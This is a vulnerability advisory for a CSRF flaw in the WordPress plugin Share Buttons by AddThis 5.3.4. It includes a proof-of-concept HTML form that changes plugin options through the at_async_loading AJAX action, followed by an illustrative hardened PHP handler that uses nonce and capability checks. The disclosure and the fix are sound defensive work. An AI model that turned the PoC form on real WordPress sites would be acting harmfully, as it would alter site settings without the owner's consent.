Share Buttons by AddThis [CSRF]
Missing anti-CSRF checks in the WordPress plugin Share Buttons by AddThis.
Description
The Share Buttons by AddThis plugin for WordPress is missing checks
against Cross Site Request Forgery attacks when saving options through
the AJAX action at_async_loading. This could allow a malicious user to
launch a CSRF attack in order to update plugin options with arbitrary
values.
This action is available only if the user has chosen to control the
plugin from the AddThis website. That option is found under
Settings → Share Buttons by AddThis → Advanced Options → I want to control my plugin from...
and is not enabled by default.
PoC
<form action="http://wp.dev/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="addthis_settings[data_ga_property]" value="XXXXXXX">
<input type="hidden" name="addthis_settings[addthis_config_json]" value='{"username":"pWnD"}'>
<input type="hidden" name="async_loading" value="1">
<input type="hidden" name="action" value="at_async_loading">
<input type="submit" value="Click Me">
</form>
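A hardened handler for the same AJAX action, added here as an illustration and not taken from the plugin's code: it verifies a WordPress nonce and the caller's capability before touching addthis_settings. The hook names, the nonce action string, the script handle and the option layout are assumptions.

```php
<?php
// Added example (not the plugin's own code): a CSRF-safe pattern for a
// WordPress admin-ajax handler such as at_async_loading. The nonce action
// 'at_async_loading', the script handle and the option keys are assumed.

// Server side: register the action for logged-in users only (wp_ajax_*).
add_action( 'wp_ajax_at_async_loading', 'example_at_async_loading' );

function example_at_async_loading() {
    // 1. Anti-CSRF: verify the nonce sent as _ajax_nonce. On failure
    //    check_ajax_referer() terminates the request before any option changes.
    check_ajax_referer( 'at_async_loading', '_ajax_nonce' );

    // 2. Authorization: a valid nonce proves intent, not privilege.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Validate and sanitize each field before persisting it.
    $incoming = ( isset( $_POST['addthis_settings'] ) && is_array( $_POST['addthis_settings'] ) )
        ? wp_unslash( $_POST['addthis_settings'] )
        : array();

    $settings = (array) get_option( 'addthis_settings', array() );
    $settings['data_ga_property'] = isset( $incoming['data_ga_property'] )
        ? sanitize_text_field( $incoming['data_ga_property'] )
        : '';

    $json = isset( $incoming['addthis_config_json'] ) ? $incoming['addthis_config_json'] : '{}';
    if ( null === json_decode( $json, true ) ) {
        wp_send_json_error( 'addthis_config_json is not valid JSON', 400 );
    }
    $settings['addthis_config_json'] = $json;
    $settings['async_loading']       = empty( $_POST['async_loading'] ) ? 0 : 1;

    update_option( 'addthis_settings', $settings );
    wp_send_json_success( $settings );
}

// Client side: hand the nonce to the admin script so legitimate requests
// carry it; a cross-site form cannot obtain this per-user, per-action value.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'example-at-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-at-admin', 'exampleAt', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'at_async_loading' ),
    ) );
} );
```

With this in place the PoC form above fails at check_ajax_referer() because it carries no _ajax_nonce, and the options are never written.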
INFO
- 17 May 2016
- Pan Vag
- www.addthis.com
- wordpress.org
- 5.3.4
- WordPress 4.5
- DWF-2016-87042